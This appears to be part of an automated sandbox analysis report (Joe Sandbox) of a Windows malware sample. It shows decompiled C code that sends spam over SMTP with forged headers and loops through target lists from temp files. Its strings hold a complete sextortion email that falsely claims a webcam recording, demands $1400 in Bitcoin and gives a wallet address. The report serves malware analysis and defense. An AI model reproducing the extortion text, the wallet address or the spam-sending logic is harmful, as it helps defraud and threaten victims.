                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 3:
                                                                                                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 4:
                                                                                                                                                                                                                                                                                    										L22:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 5:
                                                                                                                                                                                                                                                                                    										goto L0;
                                                                                                                                                                                                                                                                                    									case 6:
                                                                                                                                                                                                                                                                                    										L47:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L49:
                                                                                                                                                                                                                                                                                    					 *(_t329 - 8) = 0 |  *(_t329 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                                    					__imp__#22( *((intOrPtr*)(_t329 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t329 - 0x1c)));
                                                                                                                                                                                                                                                                                    					return  *(_t329 - 8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}



































                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cc9
                                                                                                                                                                                                                                                                                    0x00ea1cdd
                                                                                                                                                                                                                                                                                    0x00ea1cea
                                                                                                                                                                                                                                                                                    0x00ea1cfb
                                                                                                                                                                                                                                                                                    0x00ea1d11
                                                                                                                                                                                                                                                                                    0x00ea1d16
                                                                                                                                                                                                                                                                                    0x00ea1d22
                                                                                                                                                                                                                                                                                    0x00ea1d27
                                                                                                                                                                                                                                                                                    0x00ea1d33
                                                                                                                                                                                                                                                                                    0x00ea1d38
                                                                                                                                                                                                                                                                                    0x00ea1d44
                                                                                                                                                                                                                                                                                    0x00ea1d49
                                                                                                                                                                                                                                                                                    0x00ea1d7c
                                                                                                                                                                                                                                                                                    0x00ea1d94
                                                                                                                                                                                                                                                                                    0x00ea1d99
                                                                                                                                                                                                                                                                                    0x00ea1d9e
                                                                                                                                                                                                                                                                                    0x00ea1dbc
                                                                                                                                                                                                                                                                                    0x00ea1dec
                                                                                                                                                                                                                                                                                    0x00ea1e04
                                                                                                                                                                                                                                                                                    0x00ea1e09
                                                                                                                                                                                                                                                                                    0x00ea1e0e
                                                                                                                                                                                                                                                                                    0x00ea1e35
                                                                                                                                                                                                                                                                                    0x00ea1e4d
                                                                                                                                                                                                                                                                                    0x00ea1e52
                                                                                                                                                                                                                                                                                    0x00ea1e57
                                                                                                                                                                                                                                                                                    0x00ea1e7e
                                                                                                                                                                                                                                                                                    0x00ea1e96
                                                                                                                                                                                                                                                                                    0x00ea1e9b
                                                                                                                                                                                                                                                                                    0x00ea1ea0
                                                                                                                                                                                                                                                                                    0x00ea1ec8
                                                                                                                                                                                                                                                                                    0x00ea1ee0
                                                                                                                                                                                                                                                                                    0x00ea1ee5
                                                                                                                                                                                                                                                                                    0x00ea1eea
                                                                                                                                                                                                                                                                                    0x00ea1f14
                                                                                                                                                                                                                                                                                    0x00ea1f2c
                                                                                                                                                                                                                                                                                    0x00ea1f31
                                                                                                                                                                                                                                                                                    0x00ea1f36
                                                                                                                                                                                                                                                                                    0x00ea1f54
                                                                                                                                                                                                                                                                                    0x00ea1f84
                                                                                                                                                                                                                                                                                    0x00ea1f9c
                                                                                                                                                                                                                                                                                    0x00ea1fa1
                                                                                                                                                                                                                                                                                    0x00ea1fa6
                                                                                                                                                                                                                                                                                    0x00ea1fbf
                                                                                                                                                                                                                                                                                    0x00ea1fc4
                                                                                                                                                                                                                                                                                    0x00ea1fc9
                                                                                                                                                                                                                                                                                    0x00ea1fe2
                                                                                                                                                                                                                                                                                    0x00ea1fe7
                                                                                                                                                                                                                                                                                    0x00ea1fec
                                                                                                                                                                                                                                                                                    0x00ea2008
                                                                                                                                                                                                                                                                                    0x00ea201c
                                                                                                                                                                                                                                                                                    0x00ea2030
                                                                                                                                                                                                                                                                                    0x00ea2044
                                                                                                                                                                                                                                                                                    0x00ea2058
                                                                                                                                                                                                                                                                                    0x00ea206c
                                                                                                                                                                                                                                                                                    0x00ea2080
                                                                                                                                                                                                                                                                                    0x00ea2094
                                                                                                                                                                                                                                                                                    0x00ea20a8
                                                                                                                                                                                                                                                                                    0x00ea20bc
                                                                                                                                                                                                                                                                                    0x00ea20d0
                                                                                                                                                                                                                                                                                    0x00ea20e5
                                                                                                                                                                                                                                                                                    0x00ea20ea
                                                                                                                                                                                                                                                                                    0x00ea20ef
                                                                                                                                                                                                                                                                                    0x00ea210b
                                                                                                                                                                                                                                                                                    0x00ea211f
                                                                                                                                                                                                                                                                                    0x00ea2133
                                                                                                                                                                                                                                                                                    0x00ea2147
                                                                                                                                                                                                                                                                                    0x00ea215b
                                                                                                                                                                                                                                                                                    0x00ea216f
                                                                                                                                                                                                                                                                                    0x00ea2183
                                                                                                                                                                                                                                                                                    0x00ea2197
                                                                                                                                                                                                                                                                                    0x00ea21ab
                                                                                                                                                                                                                                                                                    0x00ea21bf
                                                                                                                                                                                                                                                                                    0x00ea21d4
                                                                                                                                                                                                                                                                                    0x00ea21d9
                                                                                                                                                                                                                                                                                    0x00ea21de
                                                                                                                                                                                                                                                                                    0x00ea21e9
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00ea1ab4
                                                                                                                                                                                                                                                                                    0x00ea1ab9
                                                                                                                                                                                                                                                                                    0x00ea1abc
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea1ad0
                                                                                                                                                                                                                                                                                    0x00ea1ad6
                                                                                                                                                                                                                                                                                    0x00ea1ae5
                                                                                                                                                                                                                                                                                    0x00ea1aea
                                                                                                                                                                                                                                                                                    0x00ea1aef
                                                                                                                                                                                                                                                                                    0x00ea1af6
                                                                                                                                                                                                                                                                                    0x00ea1af9
                                                                                                                                                                                                                                                                                    0x00ea1b08
                                                                                                                                                                                                                                                                                    0x00ea1b15
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b1b
                                                                                                                                                                                                                                                                                    0x00ea1b21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b3c
                                                                                                                                                                                                                                                                                    0x00ea1b71
                                                                                                                                                                                                                                                                                    0x00ea1b77
                                                                                                                                                                                                                                                                                    0x00ea1b7a
                                                                                                                                                                                                                                                                                    0x00ea1b3e
                                                                                                                                                                                                                                                                                    0x00ea1b4f
                                                                                                                                                                                                                                                                                    0x00ea1b55
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b92
                                                                                                                                                                                                                                                                                    0x00ea1b97
                                                                                                                                                                                                                                                                                    0x00ea1b9c
                                                                                                                                                                                                                                                                                    0x00ea1baa
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bbf
                                                                                                                                                                                                                                                                                    0x00ea1bc6
                                                                                                                                                                                                                                                                                    0x00ea1bcc
                                                                                                                                                                                                                                                                                    0x00ea1bdb
                                                                                                                                                                                                                                                                                    0x00ea1be2
                                                                                                                                                                                                                                                                                    0x00ea1be8
                                                                                                                                                                                                                                                                                    0x00ea1beb
                                                                                                                                                                                                                                                                                    0x00ea1bf1
                                                                                                                                                                                                                                                                                    0x00ea1bff
                                                                                                                                                                                                                                                                                    0x00ea1c03
                                                                                                                                                                                                                                                                                    0x00ea1c0d
                                                                                                                                                                                                                                                                                    0x00ea1c1b
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c37
                                                                                                                                                                                                                                                                                    0x00ea1c3d
                                                                                                                                                                                                                                                                                    0x00ea1c40
                                                                                                                                                                                                                                                                                    0x00ea1c46
                                                                                                                                                                                                                                                                                    0x00ea1c4d
                                                                                                                                                                                                                                                                                    0x00ea1c58
                                                                                                                                                                                                                                                                                    0x00ea1c62
                                                                                                                                                                                                                                                                                    0x00ea1c70
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c83
                                                                                                                                                                                                                                                                                    0x00ea1c87
                                                                                                                                                                                                                                                                                    0x00ea1c91
                                                                                                                                                                                                                                                                                    0x00ea1c9f
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21f9
                                                                                                                                                                                                                                                                                    0x00ea21fd
                                                                                                                                                                                                                                                                                    0x00ea2205
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea2211
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00ea2223
                                                                                                                                                                                                                                                                                    0x00ea222d
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea2239

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1320: GetTickCount.KERNEL32 ref: 00EA132A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1320: srand.MSVCR90 ref: 00EA1331
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1320: rand.MSVCR90 ref: 00EA1353
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1320: sprintf.MSVCR90 ref: 00EA136E
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1CC9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1490: GetLocalTime.KERNEL32(?), ref: 00EA1528
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1490: GetTimeZoneInformation.KERNELBASE(00000000), ref: 00EA1563
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1490: wsprintfA.USER32 ref: 00EA164E
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00EA1CEA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1490: FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00EA153B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1490: FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA154C
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA1D11
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA1D22
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA1D33
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA1D44
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1390: rand.MSVCR90 ref: 00EA13A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1390: rand.MSVCR90 ref: 00EA13CD
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1D73
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: lstrlenA.KERNEL32(?), ref: 00EA112D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: send.WS2_32(?,?,000000FF,00000000), ref: 00EA1144
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1DE3
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(000000FF,00000002), ref: 00EA2223
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00EA222D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • If you are unaware how to buy and send Bitcoin (BTC) - Google: Where to buy Bitcoin (BTC), to send and receive Bitcoin (BTC), you can register your wallet for example here: www.blockchain.com, xrefs: 00EA214F
                                                                                                                                                                                                                                                                                    • Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s, xrefs: 00EA1D67
                                                                                                                                                                                                                                                                                    • From: %s, xrefs: 00EA1E20
                                                                                                                                                                                                                                                                                    • Mime-Version: 1.0, xrefs: 00EA1FB6
                                                                                                                                                                                                                                                                                    • Hello there!, xrefs: 00EA2010
                                                                                                                                                                                                                                                                                    • My trojan allows me to access your accounts, your camera and microphone., xrefs: 00EA204C
                                                                                                                                                                                                                                                                                    • %s.com, xrefs: 00EA1CBD
                                                                                                                                                                                                                                                                                    • You are given not more than 48 hours after you have opened this email (2 days to be precise)., xrefs: 00EA218B
                                                                                                                                                                                                                                                                                    • Content-type: text/plain;, xrefs: 00EA1FD9
                                                                                                                                                                                                                                                                                    • Afterwards, we can pretend that we have never met before., xrefs: 00EA2113
                                                                                                                                                                                                                                                                                    • In addition, I assure you that all the harmful software will be deleted from your device., xrefs: 00EA2127
                                                                                                                                                                                                                                                                                    • Received: (qmail %s invoked by uid %s); %s, xrefs: 00EA1DD7
                                                                                                                                                                                                                                                                                    • Unfortunately, there are some bad news for you., xrefs: 00EA2024
                                                                                                                                                                                                                                                                                    • All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer)., xrefs: 00EA20B0
                                                                                                                                                                                                                                                                                    • Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google., xrefs: 00EA2038
                                                                                                                                                                                                                                                                                    • To: %s, xrefs: 00EA1E69
                                                                                                                                                                                                                                                                                    • Yes, that's how the address looks like, copy and paste my address, it's (cAsE-sEnSEtiVE)., xrefs: 00EA2177
                                                                                                                                                                                                                                                                                    • If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts and on social networks., xrefs: 00EA209C
                                                                                                                                                                                                                                                                                    • Subject: %s, xrefs: 00EA1EB3
                                                                                                                                                                                                                                                                                    • An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.., xrefs: 00EA21B3
                                                                                                                                                                                                                                                                                    • I RECORDED YOU (through your camera) SATISFYING YOURSELF!, xrefs: 00EA2088
                                                                                                                                                                                                                                                                                    • Be sure, I keep my promises!, xrefs: 00EA213B
                                                                                                                                                                                                                                                                                    • I RECORDED YOU!, xrefs: 00EA1EAE
                                                                                                                                                                                                                                                                                    • Check the sender of this email, I have sent it from your email account., xrefs: 00EA2060
                                                                                                                                                                                                                                                                                    • Everything will be carried out based on fairness!, xrefs: 00EA219F
                                                                                                                                                                                                                                                                                    • Message-ID: <%s.%s@%s>, xrefs: 00EA1F6F
                                                                                                                                                                                                                                                                                    • After the transaction is successful, I will proceed to delete everything without delay., xrefs: 00EA20C4
                                                                                                                                                                                                                                                                                    • My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX, xrefs: 00EA2163
                                                                                                                                                                                                                                                                                    • You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun., xrefs: 00EA2074
                                                                                                                                                                                                                                                                                    • Date: %s, xrefs: 00EA1EFF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: rand$Time$wsprintf$File$Local$CountInformationSleepSystemTickZoneclosesocketlstrlensendshutdownsprintfsrand
                                                                                                                                                                                                                                                                                    • String ID: %s.com$After the transaction is successful, I will proceed to delete everything without delay.$Afterwards, we can pretend that we have never met before.$All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).$An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches..$Be sure, I keep my promises!$Check the sender of this email, I have sent it from your email account.$Content-type: text/plain;$Date: %s$Everything will be carried out based on fairness!$From: %s$Hello there!$I RECORDED YOU (through your camera) SATISFYING YOURSELF!$I RECORDED YOU!$If you are unaware how to buy and send Bitcoin (BTC) - Google: Where to buy Bitcoin (BTC), to send and receive Bitcoin (BTC), you can register your wallet for example here: www.blockchain.com$If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts and on social networks.$In addition, I assure you that all the harmful software will be deleted from your device.$Message-ID: <%s.%s@%s>$Mime-Version: 1.0$My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX$My trojan allows me to access your accounts, your camera and microphone.$Received: (qmail %s invoked by uid %s); %s$Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s$Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.$Subject: %s$To: %s$Unfortunately, there are some bad news for you.$Yes, that's how the address looks like, copy and paste my address, it's (cAsE-sEnSEtiVE).$You are given not more than 48 hours after you have opened this email (2 days to be precise).$You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.
                                                                                                                                                                                                                                                                                    • API String ID: 1336957093-984273515
                                                                                                                                                                                                                                                                                    • Opcode ID: 2f0df371191c995738219cfd3443e0ccc8d515b1ea6171b37b3ccadfe1e095fe
                                                                                                                                                                                                                                                                                    • Instruction ID: a3dc139ffedb456b26400be8e0cb1ed8cf0e7675f76cd764c3172d660c91fe27
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f0df371191c995738219cfd3443e0ccc8d515b1ea6171b37b3ccadfe1e095fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAE1B4F2D002086BDB10DB94DC42FEA7379AFAD304F041599F6197A181F7B5BA988F61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                    			E00EA23B0(void* _a4) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				signed int _v528;
                                                                                                                                                                                                                                                                                    				short _v1052;
                                                                                                                                                                                                                                                                                    				long _v1572;
                                                                                                                                                                                                                                                                                    				short _v2092;
                                                                                                                                                                                                                                                                                    				char _v2356;
                                                                                                                                                                                                                                                                                    				int _v2360;
                                                                                                                                                                                                                                                                                    				int _v2364;
                                                                                                                                                                                                                                                                                    				char* _t59;
                                                                                                                                                                                                                                                                                    				char* _t66;
                                                                                                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                                                                                                                    				int _t83;
                                                                                                                                                                                                                                                                                    				int _t85;
                                                                                                                                                                                                                                                                                    				signed int _t88;
                                                                                                                                                                                                                                                                                    				void* _t122;
                                                                                                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memcpy( &_v2356, _a4, 0x41 << 2);
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				E00EA2660(0,  &_v2092, 0, 0x104);
                                                                                                                                                                                                                                                                                    				E00EA2660( &_v1572,  &_v1572, 0, 0x104);
                                                                                                                                                                                                                                                                                    				E00EA2660( &_v1572,  &_v1052, 0, 0x104);
                                                                                                                                                                                                                                                                                    				E00EA2660( &_v1572,  &_v524, 0, 0x104);
                                                                                                                                                                                                                                                                                    				memset("[102.129.143.99]", 0, 0x1f4);
                                                                                                                                                                                                                                                                                    				_t59 = E00EA17D0(); // executed
                                                                                                                                                                                                                                                                                    				strcpy("[102.129.143.99]", _t59);
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v2092, 0x104);
                                                                                                                                                                                                                                                                                    				mbstowcs( &_v1572,  &_v2356, 0x105);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1052, L"%sn.txt",  &_v1572);
                                                                                                                                                                                                                                                                                    				_t66 = E00EA18D0(0,  &_v1052, 0); // executed
                                                                                                                                                                                                                                                                                    				_t67 = atoi(_t66);
                                                                                                                                                                                                                                                                                    				_t134 = _t122 + 0x7c;
                                                                                                                                                                                                                                                                                    				_v528 = _t67;
                                                                                                                                                                                                                                                                                    				if(_v528 <= 0) {
                                                                                                                                                                                                                                                                                    					ExitThread(0);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    					E00EA2660( &_v524,  &_v524, 0, 0x104);
                                                                                                                                                                                                                                                                                    					E00EA2660( &_v524, "C:\Users\Albus\AppData\Local\Temp\29997219412047.jpg", 0, 0x104);
                                                                                                                                                                                                                                                                                    					_t70 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v524, L"%s%d.txt",  &_v1572, _t70 % _v528 + 1);
                                                                                                                                                                                                                                                                                    					_t74 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t76 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t78 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					wsprintfW("C:\Users\Albus\AppData\Local\Temp\29997219412047.jpg", L"%s\\%d%d%d.jpg",  &_v2092, _t78 % 0x7fff + 0x3e8, _t76 % 0x7fff + 0x3e8, _t74 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    					E00EA18D0(1,  &_v524, "C:\Users\Albus\AppData\Local\Temp\29997219412047.jpg"); // executed
                                                                                                                                                                                                                                                                                    					_t139 = _t134 + 0x4c;
                                                                                                                                                                                                                                                                                    					_t83 = PathFileExistsW("C:\Users\Albus\AppData\Local\Temp\29997219412047.jpg"); // executed
                                                                                                                                                                                                                                                                                    					if(_t83 == 0) {
                                                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v2364 = 0;
